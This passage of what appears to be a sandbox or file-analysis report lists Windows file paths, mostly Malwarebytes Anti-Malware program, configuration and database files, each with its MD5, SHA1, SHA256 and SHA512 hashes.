| SHA256 | c01415842abaa4bb6ada941a44c132a4a41c55097fb7e931decd04e8b5d6d380 |
| SHA512 | 1e82896df024fe6a2390e415bcf8dd92f71125639daebed99e115bd9ac219b5667201d29c6b2390a2fcd505c3780ba112ddfca128137b665da0cfdbd4d63f038 |
C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe
| MD5 | 23f1360ae0e948d300f0f62b53200093 |
| SHA1 | e44fd6f0248e0a02525ee67664d83b535d9cb7d3 |
| SHA256 | 40dfe0689b744e0812ce857f7221ff85431ca37315d9b4f75ca40892af5870da |
| SHA512 | 6e34d2546626736aa26b369a86745bdb9816138244fba3d5b5e29de4585cf4e66d52c35b5c5a577f252b62a137e340dd9de36c08a06f5395baec5a726ffb5222 |
C:\Program Files\Malwarebytes\Anti-Malware\ServiceConfig.json
| MD5 | ba93a610ef03b9367bb29945e5a5ed76 |
| SHA1 | b5c1ca79a1807526d7a1d2bc78e3d884306db624 |
| SHA256 | 540670b243f7313c1add13b2bea75b8cad47b7b756ef08c78dc2f1218eeb16db |
| SHA512 | 1c7df3a826d5bf0e1c23ab395ed44e0eb9f036530575aa437fa8a86cc85f5d3edb056c9472261ed758fef6df09abe6b7526fc758e75aabf152a08e59d800f9a3 |
C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe
| MD5 | 46f875f1fe3d6063b390e3a170c90e50 |
| SHA1 | 62b901749a6e3964040f9af5ddb9a684936f6c30 |
| SHA256 | 1cf9d3512efffaa2290c105ac8b7534026604067c9b533e7b7df2e017569a4ec |
| SHA512 | fdfb348061158f8133380e9a94215f4bfc0f6ce643a129d623cb8034c49144f1489de56cd076da645478506d9fbddc7590fe3d643622210084b15fdf0d16b557 |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State
| MD5 | 53414889efcd761429a02584f4572266 |
| SHA1 | dea704d877a6bd4fd8a5d5631b43ae2697c3c6bd |
| SHA256 | 6233fc758d2f21428456231a43aedf0cce75c2ad40e474eaf17afbdc4531ba9e |
| SHA512 | 5d3b580738ff84e9420739193b9278716315afe3fe21ada51bb451e655c0d2d26af773ea38f57155e05b196fcd2c79d498085daea9025bc5664da1a3ea1037d6 |
C:\Program Files\Malwarebytes\Anti-Malware\mbtun\mbtun.inf
| MD5 | 5d1917024b228efbeab3c696e663873e |
| SHA1 | cec5e88c2481d323ec366c18024d61a117f01b21 |
| SHA256 | 4a350fc20834a579c5a58352b7a3aa02a454abbbd9eecd3cd6d2a14864a49cd8 |
| SHA512 | 14b345f03284b8c1d97219e3dd1a3910c1e453f93f51753f417e643f50922e55c0e23aab1d437300e6c196c7017d7b7538de4850df74b3599e90f3941b40ab4a |
C:\Windows\System32\DriverStore\Temp\{b465ca56-db62-a642-96d5-bfb70e17c0a6}\mbtun.cat
| MD5 | 8abff1fbf08d70c1681a9b20384dbbf9 |
| SHA1 | c9762e121e4f8a7ad931eee58ee60c8e9fc3ecb6 |
| SHA256 | 9ceb410494b95397ec1f8fa505d071672bf61f81cc596b8eccd167a77893c658 |
| SHA512 | 37998e0aee93ff47fe5b1636fce755966debe417a790e1aebd7674c86c1583feef04648a7bc79e4dedaabb731051f4f803932ac49ea0be05776c0f4d218b076f |
C:\Windows\System32\DriverStore\Temp\{b465ca56-db62-a642-96d5-bfb70e17c0a6}\mbtun.sys
| MD5 | 83d4fba999eb8b34047c38fabef60243 |
| SHA1 | 25731b57e9968282610f337bc6d769aa26af4938 |
| SHA256 | 6903e60784b9fa5d8b417f93f19665c59946a4de099bd1011ab36271b267261c |
| SHA512 | 47faab5fff3e3e2d2aea0a425444aa2e215f1d5bf97edee2a3bb773468e1092919036bcd5002357594b62519bf3a8980749d8d0f6402de0e73c2125d26e78f1e |
C:\ProgramData\Malwarebytes\MBAMService\config\PoliciesConfig.json
| MD5 | 30c4d3e8081eaf370e71f6c4be8971f6 |
| SHA1 | 417969cbe377c981dd8a9e40cc5757a5d2d33f24 |
| SHA256 | 6580c485c66fba67108801116067d8c2987990717c641c84c0226f8a4063bfbf |
| SHA512 | f182b227e25cb573a1d45458995f8eeb63ab3d9fb9ee42db37ef817f6044d7914d2b1468f83dd2f5cd41e3a9c50d5656fb1b41ce49a840d45d9499dae9c385e8 |
C:\ProgramData\Malwarebytes\MBAMService\config\PoliciesConfig.json
| MD5 | 5a16d7a7f0b6423b745c5d8c1a7cb7a3 |
| SHA1 | 88cd974089a8a744a2238592d4e9155d5842d853 |
| SHA256 | 1a84ac95afad7516bf7c4b8f6e61586da94e7b6b31ce630ff3f989e3f26ef46c |
| SHA512 | b0e3bf431d40fb27f23162b515333b6cc1ed8d7653a10c16278e9409c21fb18a8a974cdcd7a36ae7401f85feb8eec54f64ee32232a9fe26d25653296a0c6a548 |
C:\ProgramData\Malwarebytes\MBAMService\config\LicenseConfig.json
| MD5 | 77cdebc72713a496425b91459cb5d139 |
| SHA1 | e79b2224fa6bdd94dd03b1213cd2aebbd4b46e9a |
| SHA256 | b041c21f6c1cbc368053c3929432a02e7e4d7597c64d73f60ad1d832b8edbfba |
| SHA512 | a39d54bf00d0bef5cbf93ea58f119725b2ef61623313a31a86346777a21ccd737b7b35e9cac815f79049e21c057e7aa6493d0b2be8606ef6b70b354e01cee81c |
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json
| MD5 | 8e9ff529325087a35547b8aec4ed4d70 |
| SHA1 | 256e35e707c6ac1665f1912041adfa55bba77184 |
| SHA256 | ce3e66a29f93929bd50b70d09b6e625214b88b2053470b3af905d24e16584fe0 |
| SHA512 | a5374868bbcd399a03b2b188da06a69a9b429e60ec6ab3601065c1910e86dc3badf304be79d8023ccc77aaed221bfc9c311073881add101d127c4278b9cbf1fc |
C:\ProgramData\Malwarebytes\MBAMService\pkgvers.dat
| MD5 | 000d010ecd92f1bd6f0c613dcbfdc353 |
| SHA1 | f86dda96899dce54e88ae50b87a417002dfb5a3d |
| SHA256 | ccee58a15be2194f3ef64ccdc18bbbad0b140155ffaae2608791aa32bcff5ef5 |
| SHA512 | 6fc58812f6c8c12c6b4ccf8402911ece1b00ff89de1c771c1f71d78348f7c2692e917ad22574d504b202528d0ec26b923aa906d12978de8639e56f9981e320a1 |
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json
| MD5 | 8494dc46bae10a61f70e25b5ab847df9 |
| SHA1 | 74be12cf75f02e259b27e7bc4fe31403aac2a924 |
| SHA256 | 1117371ba69cabd71a5079fbc50962c57bb261dfaaf720eceff39253f00ba3a0 |
| SHA512 | 05e4dd6fd7a8e5115649c2a226602a115f4ab5ea8ec342b45cf1d84a1bb5a4e0e03eac5407971cc4c4888d63ff2e19d02162b0461326235ce7c608b4834fcdb8 |
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json
| MD5 | ab037744d88ae3b454c3cb52c4201914 |
| SHA1 | 3d25ace44a8ac6a5862e2cd10e36f5b658a415fe |
| SHA256 | cab65a1e0161dab898eecc93c233b1c432bbd1ff7c4966f78f4220b0ba8eda15 |
| SHA512 | 4d8aa08894e35938eb9c5de625d0f6594913e9577e401107bf4fe34c23822c7a622c7278e62f16275d2d055ba3be555d0ba22ea839876a9d7f156b9042f039d1 |
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json
| MD5 | f0b78f7017d1353675c69472bccfbcb3 |
| SHA1 | ce59796bb5085fecd821b4634c64ba9e9f2bb610 |
| SHA256 | 01716b3dff4c182646f828b99f16dc0584581123b287a59615c0d2034adb529c |
| SHA512 | 26e43225ab5faecabfab550d810ff1e5153b3663690858965339c301525a67b85752846183503479b224c64c296651f97b90a306acda3afccafb3c6dee402b06 |
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json
| MD5 | c019c27dfc81274ecb72b9a9bfde1dac |
| SHA1 | de266338d4eecff9a708aabd971cb5dad73f1b04 |
| SHA256 | f06c9201871dba3f0cd412ef80e3c74b26f091b922a32508a5e7d0c3255073ef |
| SHA512 | bafa5d78bd7e658e1e15b098938c4ac0f31c07ae96fd29b45b27ec7d8d636fb1b1cd88c19080518b903708efbd43c9d2781364742ae4fb5155aab7041c74f034 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\rdefs.mbdb
| MD5 | 2f7423ca7c6a0f1339980f3c8c7de9f8 |
| SHA1 | 102c77faa28885354cfe6725d987bc23bc7108ba |
| SHA256 | 850a4ea37a0fd6f68bf95422d502b2d1257264eb90cc38c0a3b1b95aa375be55 |
| SHA512 | e922ac8a7a2cde6d387f8698207cf5efbd45b646986a090e3549d97a7d552dd74179bd7ac20b7d246ca49d340c4c168982c65b4749df760857810b2358e7eb69 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\rules.mbdb
| MD5 | 25be5a55eaf0976feed2b3a75b0505d1 |
| SHA1 | 395076c02889d3e0db17b1e49d2caa1d43eea7bc |
| SHA256 | fedd7c2e27400b3fd02294fd293907a34961934fc4e9a0587f28aa01117c0c73 |
| SHA512 | f190b641319da454a7b11fd5cb31acbc341a1ad0b40093bb12618a2e5da99f3ddb4de6ff2e404b1104e28ec4876b5503ad819685c3f543198f4e5d173f9ff206 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\prot.mbdb
| MD5 | 546d9e30eadad8b22f5b3ffa875144bf |
| SHA1 | 3b323ffef009bfe0662c2bd30bb06af6dfc68e4d |
| SHA256 | 6089fbf0c0c1413f62e91dc9497bedc6d8a271e9dc761e20adc0dccf6f4a0c1f |
| SHA512 | 3478f5dcf7af549dd6fe48ad714604200de84a90120b16a32233b6d44fa7240f5f4e5fe803f54b86bbdfd10fa1bfdd88fb85eb6a78e23e426933f98d0a2565ec |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\clean.mbdb
| MD5 | 1a6cb54aa16c7a795fc6c8003bf75de4 |
| SHA1 | 6f9dd6fba29e3140727f27182f6f3798a5d3a15e |
| SHA256 | 2cda302704d21fc0bb1c9b68cca1205594af5d8f09b6c0ddb5b3e146eaf63af4 |
| SHA512 | 6a0fabbb19e3f626d2ee58ceb560c8352076d6b8ec9ac4b2f06876e0971ebace2b87b8528d8f69dd020f7fece780ea2dec7e862a1c1357632cb3b0096a060788 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\wprot2.mbdb
| MD5 | 32bb6eedf019fda7aa124f697a5e5f72 |
| SHA1 | da8ab67609b6c21d490568743814b6faafd83b1b |
| SHA256 | 140fe06a90625ce76c88a9983815bada33df12cac5712946f13bf91ae0ea560d |
| SHA512 | dee71a0da88f6ff2066de182f55b8fb7abee5b23be42ddec1a471f187b529524d29b6edff36ef8b2ce6ebba68c794cff2e573377642f984cf2306bf3f25c55f3 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\tids.mbdb
| MD5 | ed6e91030855c2b3c76f45dad4d80563 |
| SHA1 | 2ff9c379c281ea0b6ecf5e1acf18ef756a058f0c |
| SHA256 | 4738ff9f7c89cc53f97946daf3e9bbfde33fc10ebb826ef8f56a7f70c967d6a8 |
| SHA512 | 270af937121b17b382ab42cdda18d0ff47390553d6887c6711fbdfb75c16acad7a2aa27a573abce46b37ff0330ea0c5dc6a0b17975ef33181c582c7e991c5ddc |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\scan.mbdb
| MD5 | 7cde73dc19af25788ed7e0c6488ec10e |
| SHA1 | 6d4dba59613d611f361c4edbd2ab252657711da4 |
| SHA256 | 376c327c96c1ebb4abebac74854f66090cd4d4a964e36c3e4fcc5cf3310035bc |
| SHA512 | 1ceeaba9b07241d01afca7327b2ed6720efaedc38403a66ef1caea8e806d0068bef3a1b4b6a4fdf327d92298efb027020f346a1274119e130899800c9b877801 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\Global.sr
| MD5 | eeafe4dbe0bbcc61fe36b141e5611c19 |
| SHA1 | e461639483f3ee07266abfb3852c0ff5743bac68 |
| SHA256 | 79b5dd59e767937bf1a7591d503084014f956e2fcba70baac8ce45428a8820e5 |
| SHA512 | 60d4c18979322e040477ce0773a885d41aa4bb9aad6da40d584a9fcc67553fbfca5e9ed748d1d3a7277143c5dc4b99f17ab038bc8da45b2179a65c57162515c7 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\mbdigsig2.dat
| MD5 | 78750bdf916d4655aa6007b733b623f3 |
| SHA1 | 1f5b0cb8e422d73c56b5962a154a097c61c9a002 |
| SHA256 | 499d3480d391fa673b38893e3c436fcd84a975a7f171e83ebc356159c396afd9 |
| SHA512 | a5bc368b1f4d4263b43e8c5e0588fb7a5ffc243037129f3fe4773da03c6a178827fafc7e09a85e27158316003b85e041374dd40315544268b2391ec9e7ded96c |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\dbmanifest2.dat
| MD5 | ad647cad390b161f9564826e4d8e5f81 |
| SHA1 | 4c132658b5b31a968f9ccb0595f95cd29d1e6460 |
| SHA256 | 5ef3b0e83f9573d506e3f032019feca474a1484f6f1dbf0612c92339bd6e5c4e |
| SHA512 | 4d356e90c83fdb494996d951d3774ca258951f6df66fde9aeed2892d245aba2e36434d0d233df7d6eab5e78651ecc4ed407bb31a4ceca0166377b4fae212491e |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\cfg.bin
| MD5 | 634c582955715ab32ddfe83406564b05 |
| SHA1 | 79c0a481c1ff351c2e622e440bf7e6795ca6efff |
| SHA256 | 4783d65126b8c83fd9aa8ee0e8428d10c20adb3daee6b6c92dab9aaa26964a67 |
| SHA512 | 38af39912704bed274cbea2c8cc0d136b94e328433cc02bfa7f04fdd9313473e11f6e6cd34a7b4614de55de0d8746ade1040a9eca4f37fff178a07d3e8f5b1d6 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\Global.nm
| MD5 | fd835687e17d10935302bda69a2a9087 |
| SHA1 | 8bc7cf884c2fc73146865c5ae97fd71715553be1 |
| SHA256 | c62931249c981b1cc9bd7fad95d20454758b91d7dbef532d9c58a897c65a1d7a |
| SHA512 | 3012a5816d919db10541d8fb1185a20f521592ebadee38fee61ed18808b200f36b835e0da4cff7937f6011477947c5eb418bb66891cdcb681ce5958499d19d1f |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\exclusions.txt
| MD5 | aef4eca7ee01bb1a146751c4d0510d2d |
| SHA1 | 5cf2273da41147126e5e1eabd3182f19304eea25 |
| SHA256 | 9e87e4c9da3337c63b7f0e6ed0eb71696121c74e18a5da577215e18097715e2f |
| SHA512 | d31d21e37b0048050b19600f8904354cff3f3ec8291c5a7a54267e14af9fb88dfb6d11e74a037cc0369ade8a8fb9b753861f3b3fb2219563e8ec359f66c042db |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\dynconfig.dat
| MD5 | 10f23e7c8c791b91c86cd966d67b7bc7 |
| SHA1 | 3f596093b2bc33f7a2554818f8e41adbbd101961 |
| SHA256 | 008254ca1f4d6415da89d01a4292911de6135b42833156720a841a22685765dc |
| SHA512 | 2d1b21371ada038323be412945994d030ee8a9007db072484724616c8597c6998a560bc28886ebf89e2c8919fb70d76c98338d88832351823027491c98d48118 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\Actions.dll
| MD5 | 20d70c6e04dbf14c01ab2d756e97854f |
| SHA1 | f172c8b8c0e87d2a9ab064513dce004d16d03e0d |
| SHA256 | c4002339b58bc493ae3540bafe1b2ca0a70bba0f853e29f60e0f6a1680fa9a24 |
| SHA512 | 13e073cd4b3d53c6d9fdda671a55962266b5c0a18abcb5774092c35f0d0bf2c5d0d9802d8955d32cceb166821634bfc067dac7809c9ade143cf3a3b497743b36 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\sample.dll
| MD5 | a9341141dc8a9f27fa46758ed69980e6 |
| SHA1 | 220ecb05f5456b3d2b0b05f5cb6fda6197207563 |
| SHA256 | bfd1e593eec056049ac2e52daddb635ae9e4047e6d81aa61df0496f6f634cb73 |
| SHA512 | 528cab8c240154fde3c0a728fd4d0250648a105ca95355e5c674d37ee620ab74fa499c85cb7781ae676b93117560c3c1f4d4b9f6f341af958de3073c447f442b |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\ig.exe
| MD5 | 5f4f4838ed0a41b4ae61b16cbdb7c41c |
| SHA1 | c9e300e9f5245d736d6fcc42dfb990b2639aac52 |
| SHA256 | cd1e8db650a73bfbc124467737b96fe2080f27f27e031e1043ddc76a9844fb06 |
| SHA512 | 9bb1ac32b62fb1398616081574b03c0eac37377b4102641299202601f4881fe64c98111334f783d013b509f7eb36ec9b79a7b71bf07436632c280c1ae3142755 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\BrowserSDKDLL.dll
| MD5 | a3fe79081a59d493c01b5c1139babdc9 |
| SHA1 | 1505cb4053bcd9b55c40227ad6b62a2457cebbdf |
| SHA256 | 60c8c024ff020f04fcccec10ee78872bb1e6985463d6370c6af095761d88b860 |
| SHA512 | 22310a585edb36050ff20356cd9eb5129cdae3ffea2ccd7a54d9652dbd336d7f402ed119dc59ae3250b93bad40e75983184256c0bb239cff049bbb983f487bdc |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 4abf38cf39bb0e392f038139581d1996 |
| SHA1 | 8f56790b15fa213ec8e7bdbdc453903b4fa2c9a5 |
| SHA256 | bb494a1fc1d707131e042bb75de9208560eac21ad3a16a159af49714dda09273 |
| SHA512 | 204e571dc6c41fb3bfbb78a20b5eb8f94dec2be30d1d870b0f69053f9fbdfd680dc77022f66f1eb3e72669b91951e583a0330d64eca2ecc94955472a54fd1dd9 |
C:\ProgramData\Malwarebytes\MBAMService\config\TelemCtrlConfig.json
| MD5 | c86fb53851e162b5bff094e48880ed5d |
| SHA1 | f309f88869b7e8b623ad7d745e5f8c6b2edf4bb4 |
| SHA256 | 9eec3722f2a595422668df5eeaa1332b8fd9066f2376ae15b92aa1ba13dbc7e1 |
| SHA512 | 1197168f0ba1e8741997b9c6ceee36b808d74d50cbbf99b11b2d1bbf6ca438a87ae92a29b2e7ee167732921698cf960e6b4b30f13f48bcffef371b6fdac0dd34 |
C:\ProgramData\Malwarebytes\MBAMService\config\TelemCtrlConfig.json
| MD5 | daa3e036c83666d95269be0265a22968 |
| SHA1 | 987747b22e3ca0f8a284ad9fa96e876b6c7298d4 |
| SHA256 | 70c80444682663ec196054d7b7e29805368cdeac3d1f10766830dc58bbbeee5a |
| SHA512 | cbdc18a327e4ca9b71306c720f562539c4902d0ba57c8ebbe59d5ac044cc6129ccd225b6fcc48cfbbf155ea1961f76b8f9920fc20c53d563197392d7be0453e0 |
C:\ProgramData\Malwarebytes\MBAMService\config\CleanControllerConfig.json
| MD5 | f6fdc34f2d805c0634d3f61e87e96032 |
| SHA1 | bf43d3936a4ee3699da9e3144d16ab11538b0aa3 |
| SHA256 | d6e8baab16d189f98f301c5c8f0a9fe776a6a2c177a8a0ed3716cc5027e31320 |
| SHA512 | 1350690e9e09d50fb1d14dc58b90073ca60e43da9c67c0230b5113d3d3602b65eb77eda9ff5dffcfec652a9250070212d5b34147ac0afb63cfd678b8f2c51c2c |
C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json
| MD5 | 78a5d5629dffc2d6e736fb4f3af3d27c |
| SHA1 | 9ae95a1d3cce059215a3dc74c9f5e36ae115b9c2 |
| SHA256 | 4cfb0bf0a285f468e9ded70f237ebc9e10cdb76f5774eab9216842b93d9e0bb5 |
| SHA512 | 35384be231001e76df76ef232c7ce8367dcbe84ded2b5f39513e87a3459a31543be11567f05d92afea8153b11ced0a7d70638f5c3d2cca29692ae0fda1525eef |
C:\Windows\System32\drivers\mbamswissarmy.sys
| MD5 | 4b2cc2d3ebf42659ea5e6e63584e1b76 |
| SHA1 | 0042da8151f2e10a31ecceb60795eb428316e820 |
| SHA256 | 3db4366ccb9d94062388000926c060e2524c7d3ee4b6b7c7cf06f909f747fc6c |
| SHA512 | 804d64d346b3dbb1ce3095a5d0fa7acc5da0bf832c458e557dac486559fe53144f15f08c444fea84a01471fd5981e68801a809b143c56b5b63e3e16de9db0d98 |
C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json
| MD5 | 4eac60dbe96fa55ce861e2ae52d2ccf1 |
| SHA1 | b3333d24499947c95528a080179555c21936f4f4 |
| SHA256 | 541bb3ba2973363c1a08c6344e0dfb8bc90b60c3cdbcd20cab700336ac34d4e3 |
| SHA512 | 9c1656c0000539319fbee0858b651a01322a1bd17ef343922ba5198bc2c96b9a306fe5ca650acdebdfe5c43bb94c8cf2cc9a24c19037e75e6592b04f82818c77 |
C:\ProgramData\Malwarebytes\MBAMService\config\TelemCtrlConfig.json
| MD5 | a3d70cdc504c2f9d50698b3b9a1793ed |
| SHA1 | 536e0802ac24ae2b0b02da0459b79dee7daf1731 |
| SHA256 | aa8561fed254d5805f19abb223f7c4565f7b2fd4bc4627de1a89425608be5279 |
| SHA512 | c30d1cb93e22cfa54bdfe4d21542fd3b06318bf553b75beb442fd99b49ed6b1cdc4f400f7b0f71c34c22e34ed2d78b30e9d119a3f272905ae968e94d897e59d3 |
C:\ProgramData\Malwarebytes\MBAMService\config\RtpConfig.json
| MD5 | fe7d06e6bb6025e1fd7896bb8e4846c2 |
| SHA1 | 52d1f1b31b8de310248efaab197b9e43040fb366 |
| SHA256 | d31c655ac8b9cf2fba5d945e18c4384f4c8127309b59a97b4319f2f9fb31fbf8 |
| SHA512 | 5ea10fe5af54524a6ec25c08ea0f12cc5b8c6794ba2f147ff7758e11718480e6f1e1736d3ff093c9e4b1cad18d004bcf3ec6badd6d2fa35a8306228afa717d0a |
C:\ProgramData\Malwarebytes\MBAMService\config\MwacControllerConfig.json
| MD5 | d2e7499f1f9f027bb68ffcf33fd970ed |
| SHA1 | fa3dd384572d03ff34beb013c165f1abb329939a |
| SHA256 | bb55a728cd3d7cff548a3da99246e19d49397be6a8e12db408aa47b4369d88bc |
| SHA512 | c78162a6ffac9d56f2fdd098c6fe4970b7e0968b422362640db2fd50b96c5cb3e00650aa52328188eaf6efe704a559a101c544fff3926bdd11f1d7ec596511ad |
C:\ProgramData\Malwarebytes\MBAMService\config\MwacControllerConfig.json
| MD5 | 14dcd717f0113173a181a67d9abf1487 |
| SHA1 | a0177c0b2bee648e81c0e9fca401a1e50738a9f9 |
| SHA256 | c15ff94f65233b690c05d7585b8a4f4096a5bc71149b536938b940d898610269 |
| SHA512 | ebf6a0966e9a478078a39a57fa5c975d3ea5a4925893a8301a31baaba1fb2222173358bb34663eb216ff24509396e2e35a7a049ab613d963cc50ce6d8616c1a0 |
C:\ProgramData\Malwarebytes\MBAMService\config\ArwControllerConfig.json
| MD5 | 3a932a2643c729e91625978093440a77 |
| SHA1 | f9ea670332a4655b0e2967c1b7166d8b2b9be0c1 |
| SHA256 | 02a7d072327f6629244c77bba3a9be7b83b8798f1b4a6f079bfefa2595a9a38e |
| SHA512 | 56a9ae9a7720e131c63e0ec2f410bdc42f4436ff7c865ac9b09a4503492ab503d439b3b73a2c2a096132ee489655f795dae3be3b3150bd439b5fcfddc5a50e31 |
C:\ProgramData\Malwarebytes\MBAMService\config\AeConfig.json
| MD5 | 9451d130d309edb57b894aa7be27f450 |
| SHA1 | 8b5c168d7d969fecf961abee60ce98fb200c7b55 |
| SHA256 | a26d596e7f4ccd317ec236149d384858e96debc2f60fd0a5a0fcfe3d779188c8 |
| SHA512 | 44bfb3291e02ee4e5f7d56a6aa8f19539bd79f2ef68e352ceb2ba7e7078142d00a2a8d64bf26970574de0a0415e9a0874e43ebf8618d6924dd31665e205cf2e0 |
C:\ProgramData\Malwarebytes\MBAMService\config\AeConfig.json
| MD5 | 24c797a3a52fd652c939df8b86cb0eb2 |
| SHA1 | a6e22656ee09e738e83b90ef1fe0899d48b84c77 |
| SHA256 | e0b57dd24603901f77e07c8415c3dab81841cff74264f03dd02369390f2cadd1 |
| SHA512 | 87ca81ad3e3c3b47aba9e0bd151367fe0d75429d17dc9fe292ac26199465d4bafecda8388cf98fd6e43dcab002f01df8a696f8ce83e9a21e08d2290c1a9b8afa |
C:\ProgramData\Malwarebytes\MBAMService\config\AeConfig.json
| MD5 | 8e8a8e532623a220689911f14fb93f91 |
| SHA1 | 739f3f5e9ecdbb114f70a48d4eddd00b15a7ffe8 |
| SHA256 | c7bacac4c05ae1677af86f8c8e9d6fec413aac0006a541ad331a6b123f0cce71 |
| SHA512 | 038787fb595560d3c289d2d3dda8d822362b1cbab6aaf596883f7346d0449079a3333dbac68ab8c01d5d7256174095d1316e49cc8868a4b440e04d44cfb39357 |
C:\ProgramData\Malwarebytes\MBAMService\config\AeConfig.json
| MD5 | a0b90eabfecb73bf286f6c85afaa0b2f |
| SHA1 | 446defd793f05de39bd019dbfba42dedf311d7c4 |
| SHA256 | 93d6ebf42e895c42a6b2867ef008eca4414ea1f2ee54741a973c9983def589cb |
| SHA512 | 01f1e4fd6ba8995339f31ed9d1d27f64b0b040b171886146c61c4be8d5fce67a8f2e12ed25253621028ea2c8e5b483a2d1a68bdc650338bd81649d0f1013434a |
C:\ProgramData\Malwarebytes\MBAMService\config\SpConfigFile.json
| MD5 | 9ceb8879bd6ac89c61ccc74baf20ada5 |
| SHA1 | ae0c207674980ef3d4502414ee3cbb6f24a4e8da |
| SHA256 | 6641f0e31bf20057b3c6f8ccb229d05e6da08f053e31b38ba87adf27f72bebf1 |
| SHA512 | cf1c36b8212eebec91ff963e2b19e4fe60261056bad25e1fe4f0d7846cc2ac0c6fec7a2bb85630c6af8dc5dd49893057031d9130ad4dd0c391d776852edbb1dd |
C:\ProgramData\Malwarebytes\MBAMService\config\VPNControllerConfig.json
| MD5 | 7cdf7d41a1652167437e2c2979a8bc53 |
| SHA1 | 8f4650bb738abee980d9c0f0230dda6a9af684c9 |
| SHA256 | 2222bbe076df2a0a10d4ed79fc30904d0a9e18d3f488c02af3e67fb46e38e075 |
| SHA512 | 138b6dc18693282ec9de1e6f8ee4b539b7948b983d2f2e3b396ea9247dd4ec4247313d537b7dc1f5ee90d94dc530ed79e624ffe0df57599a5c8c813b7e771950 |
C:\ProgramData\Malwarebytes\MBAMService\config\VPNServerListConfig.json
| MD5 | 9530adc9e12cf7006d2a0ace5b4fd72f |
| SHA1 | 769851183dece340c0b72c3e920ff38a8b2fb122 |
| SHA256 | 5f6f322475ac388fc3a007c3245259b0b0d46c59954f39d565f85df3dbc7d208 |
| SHA512 | c9054e3afdbe58e25ed92ad5184a32414cf72443f858b8926a778e49141ebfd4d4c03841856ff34ffa7fea2e8908e44648395a5be669092facafa0382454aee1 |
C:\ProgramData\Malwarebytes\MBAMService\config\TelemCtrlConfig.json
| MD5 | 5d9d10766f90258bbfa3d40fcc94cca9 |
| SHA1 | e587292f41f536cb610fb71509bab45e0d6da406 |
| SHA256 | 08da6c2214b87f791ac537925cb04ff938595d1dd505c003522185c57137051c |
| SHA512 | c7c7714edf38189792bbd0826a47ab75b6f33803212c0c46de02a75cb430d3ca51c436710e3b9d03bb49bdcdf83e02f221749e42a47030bd1196c6489bb8e967 |
C:\Program Files\Malwarebytes\Anti-Malware\ServiceConfig.json
| MD5 | e4c0220015afc17934b5791222f5ebf4 |
| SHA1 | 658f1c1afc4993c8662de702aa1e77f6a86f4ea5 |
| SHA256 | 3bb2109d7acef996a0dfc9a69898ce3de4ce9cd7aad2ab9cdd404e07e59f0adc |
| SHA512 | c5f9a0de214a9c8c7fb34ef377b5996ddf7b73f4cae04387bf38d40730d3e02231c82ccf98d58bfece34032673f9b82a303907497772cf4bef59c87114499428 |
C:\ProgramData\Malwarebytes\MBAMService\config\LicenseConfig.json
| MD5 | 2dc78cb78a132265652047b53651ac25 |
| SHA1 | 2b82ef78fed9e7550b1ac9c779dbcefc34be0559 |
| SHA256 | 2d422101b1ecc45c5713f81c4d8237646ad6c1e849981868b5cdc74f47a0ec36 |
| SHA512 | 0c3de1f45aeba480298b3e1b7455a5d98c5bc1b1a47ee7800b90ea414b4d39b4a01daa291c0ee7eb09aa2f6cc65ad28953855c840df5ec44195ff58dbf595f56 |
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json
| MD5 | 53df2dfb221d8792ce6551c56f846b7f |
| SHA1 | bac329f608dad4c914c767150b31dd16635f413b |
| SHA256 | 43a9412b37826a6de485bbfbadf63af96a3bb8cfca12d0aa66c132ae177ae2d7 |
| SHA512 | bcff19aef11d8b71b1a2df1e0fa3dad4e3478cb4ce022bdcb1544c4b8697b16a0a52d79c77aad4f213649ba3dd18fe3afb592b7e130915b1ac0af0517c786f5f |
C:\ProgramData\Malwarebytes\MBAMService\config\LicenseConfig.json
| MD5 | 5bf0a765506dac3d8906dddff9d7303d |
| SHA1 | 461731f11e44c8fcf21e76bf8feead2dda32bba8 |
| SHA256 | df2db48a98e4016e5d665533276074c3af7afa37ac0d7f386e6214c01009f477 |
| SHA512 | 131e92bdc2697911398afb4bbf1d2bfc9800cc26d6a4b22649cc6477937fbd461c5106489d075fcab8c7418d4bf1f28ef30778df67eaad3b04f5e5d67d97b53a |
C:\Program Files\Malwarebytes\Anti-Malware\mb5uns.exe
| MD5 | d289d84c0406750cef937bdcdbd32740 |
| SHA1 | 89a8a040a62bc0d2c2809177773f6a10bb83fae9 |
| SHA256 | e21d1060a4a2ad8d0cc781d0ec252b497d96915b648fbc9d1ab46ab750c8d00d |
| SHA512 | c8abdac9756ba299ecd3285a134219ccc222acc9f005a71eae85fd815a93b17b8857ac1e446a8122755e8702a39b76c13df962ba79f45855c752e3347311e09b |
C:\ProgramData\Malwarebytes\MBAMService\config\VPNControllerConfig.json
| MD5 | 587cc2c1e22ba6975cb01ff3fbeb5bd3 |
| SHA1 | 28261dd70a617f312972e646a75d89fa2d3173e2 |
